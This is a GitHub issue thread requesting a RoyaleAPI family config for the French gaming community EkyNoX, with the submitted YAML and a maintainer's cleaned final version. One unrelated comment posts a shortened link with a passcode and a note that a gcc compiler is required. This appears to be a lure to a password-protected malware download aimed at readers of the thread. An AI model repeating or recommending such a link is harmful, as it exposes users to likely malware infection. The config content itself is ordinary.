### ISSUE TITLE
EkyNoX

### ISSUE THREAD

**Issue by AlexC2142** [RoyaleAPI/family-config#1085]
```yaml
name: EkyNoX
key: ekynox
color: purple
emblem: Flame_03
info:
  logo: https://images.app.goo.gl/LLRnTeino5P8Q1Tj9
  description: >
    EkyNoX est une communauté multigaming (bs, coc et cr) comportant 2 clans clash royale :     FireLock = Clan où les gros profils sont acceptés, gdc non obligatoire mais conseillée, on rush les ligues (+7000tr nécessaire).   SilverForce = Clan chill où on accepte tous profils.          Dans les deux cas, on demande d'être un minimum ACTIF !
  social:
    - twitter: https://x.com/ekynox_off?s=21
    - discord: https://discord.com/invite/pNZWxf47vq
    - instagram: https://www.instagram.com/ekynox_off?igsh=MTZ0djV6dmI1MDNzYg%3D%3D&utm_source=qr
    - youtube: https://youtube.com/@ekynox_off?si=PNn58xM6dWq6HF5w
clans:
  - name: FireLock
    tag: GCRVRLU9
  - name: SilverForce
    tag: QJ88VPVY
```

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by karol-clash** [comment]
This is your final family config. The changes should be live in few minutes.
```yaml
name: EkyNoX
key: ekynox
color: purple
emblem: Flame_03
info:
  logo: ekynox.webp
  description: >
    EkyNoX est une communauté multigaming (bs, coc et cr) comportant 2 clans clash royale: FireLock = Clan où les gros profils sont acceptés, gdc non obligatoire mais conseillée, on rush les ligues (+7000tr nécessaire).
    SilverForce = Clan chill où on accepte tous profils.
    Dans les deux cas, on demande d'être un minimum ACTIF!
  social:
  - twitter: https://x.com/ekynox_off
  - discord: https://discord.com/invite/pNZWxf47vq
  - instagram: https://www.instagram.com/ekynox_off
  - youtube: https://youtube.com/@ekynox_off
clans:
- name: FireLock
  tag: GCRVRLU9
- name: SilverForce
  tag: QJ88VPVY
```
